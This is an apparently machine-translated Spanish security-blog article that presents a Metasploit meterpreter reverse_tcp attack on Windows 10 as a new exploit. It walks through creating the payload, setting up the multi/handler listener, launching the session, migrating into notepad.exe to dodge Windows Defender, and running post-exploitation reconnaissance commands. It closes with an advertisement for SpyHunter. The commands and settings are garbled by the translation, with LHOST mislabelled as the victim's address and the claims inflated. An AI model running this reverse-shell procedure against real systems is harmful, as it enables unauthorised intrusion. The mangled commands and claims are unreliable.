| Nombre | Trojan:Win32 / Swrort |
| Escribe | Trojan |
| Descripción breve | Leer y escribir permisos en Windows 10. Permite al atacante para infectar otro ordenador conectado a la infectada. |
| Los síntomas | Apareciendo de un archivo .exe desconocida. |
| Método de distribución | Correos spam. Ataques MITM, redirecciones maliciosos. |
| Herramienta de detección | Descargar SpyHunter, Para ver si su sistema ha sido afectado por Troya:Win32 / Swrort |
Un peligroso exploit ha sido descubierto en Windows 10, usando un Trojan:Win32 / Swrort para eludir Windows Defender y obtener permisos de lectura y escritura. Anonymous investigador ha demostrado la vulnerabilidad de un canal, llamada Metasploitstation. Él muestra 3 fases en las que se puede burlar de Windows 10 defensas. No hubo información descubierto hasta ahora sobre si esta hazaña ha sido fijado o ninguna.
Ventanas 10 Multihandler Exploit Infección – Cómo hacerlo?
En el video, el usuario experto en tecnología demostró una simulación de un archivo '123.exe' que crea y ejecuta como si se abrió en el mundo real como un archivo adjunto a un correo electrónico o ejecutado por otro método. Hemos decidido dividir el proceso de infección en tres fases para ayudar a comprender mejor la metodología.
Fase 1: Preparación del archivo
El hacker crea una carga útil con esta configuración en un entorno Linux:
→msfpaayload ventanas / metro sobrenatural / reverse_tcp LHOST =
portnumber1 * – Este es el puerto utilizado para el ataque. Puede ser cualquier puerto (4444, 4324, etc). Hemos escrito portnumber1 ya que utiliza un segundo número de puerto que nombramos
Después de esta fase es completa y el archivo es creado por el atacante y se dejó caer en el sistema del usuario, el atacante puede proceder a la Fase 2.
Fase 2: El uso de la hazaña.
En este punto, el atacante utiliza MULTIHANDLER para hacerla ver el .exe y aprovechar el exploit para abrir una sesión activa(conectar) a la PC victima.
Esto puede ocurrir mediante las líneas de comandos actuales:
→msfconsole (Para iniciar la consola. Abre 'msf>' interfaz)
En 'msf' el atacante puede ejecutar los siguientes comandos:
→msf> uso exploit / multi / handler
conjunto lhost dirección IP de la víctima’
Lport Set 'portnumber1’
Después de esto, el atacante realiza la carga útil para establecer una sesión:
→msfexploit(entrenador de animales)> ventanas set de carga útil / meterpreter / reverse_tcp
Para comprobar si una sesión activa es posible, el atacante escribe el comando msfexploit(entrenador de animales)> mostrar opciones que le permiten ver esta
→Proceso EXITFUNC sí técnica Salir(aceptado: seh, hilo..)
LHOST víctima dirección IP si La escucha puerto
Lport portnumber1 si La dirección de escuchar
Esto le permite ver que configurar los ajustes correctamente y puede proceder con la infección real del equipo.
Fase 3: Infección
El comando que el atacante utiliza para iniciar una sesión activa con la víctima es 'explotar'. Después de ejecutar este comando, el archivo '123.exe' volvió con esta respuesta:
→[*] Manejador inversa Iniciado en
[*] Inicio del controlador de carga útil…
En este punto, el ejecutable se inició en la máquina de Windows. A pesar de que el software de Windows Defender se ejecuta, no se detuvo el ataque. Sin embargo cuando se escanea en busca de virus, el programa antivirus de Windows detectado inmediatamente '123.exe "como un troyano:Win32 / Swrort.A.
Para evitar la detección, el atacante utiliza una táctica, llamada migración que creó un archivo 'notepad.exe' que migra la sesión activa de '123.exe' a este archivo al conectarse. Esto se hizo con el comando:
→meterpreter> después ejecutar / ventanas / gestionar / migrate
Después de migrar el proceso y repitiendo la misma simulación pero utilizando
Desde allí, el atacante demostró completo de lectura y escribió permisos mediante la creación de una nueva carpeta con un nuevo documento de texto. Por lo que sabemos de los principales comandos que se pueden utilizar después de la conexión son:
→> sysinfo - para mostrar la versión del sistema y la información.
> Dir :/
> shell - para mostrar la versión de Windows y otra información.
> getwid - muestra Windows Id.
> ps -aux - muestra todos los archivos .exe que se ejecutan en el Administrador de tareas.
> ifconfig - muestra información sobre las interfaces (Direcciones IP y otra información). Este comando da al atacante la información para conectarse a otro equipo que está en la misma NIC y VLAN con la PC infectada. Esto puede ser muy devastador para las redes domésticas o de oficina en caso de ataque de este tipo es bien organizada.
Ventanas 10 Exploits – Conclusión
No hay información real sobre la conveniencia o no de esta hazaña ha sido fijado pero al igual que con cualquier otro software, puede haber otros más al descubierto. Por eso, en caso de que usted está utilizando Windows 10, le recomendamos que descargue e instale el programa de protección de malware avanzada. Le protegerá y actualizará regularmente con las últimas amenazas de forma activa. También, dicho programa tiene escudos activos que detectan inmediatamente las conexiones no autorizadas.
Escáner Spy Hunter sólo detectará la amenaza. Si desea que la amenaza se elimine de forma automática, usted necesita comprar la versión completa de la herramienta anti-malware.Obtenga más información sobre la herramienta de SpyHunter Anti-Malware / Cómo desinstalar SpyHunter
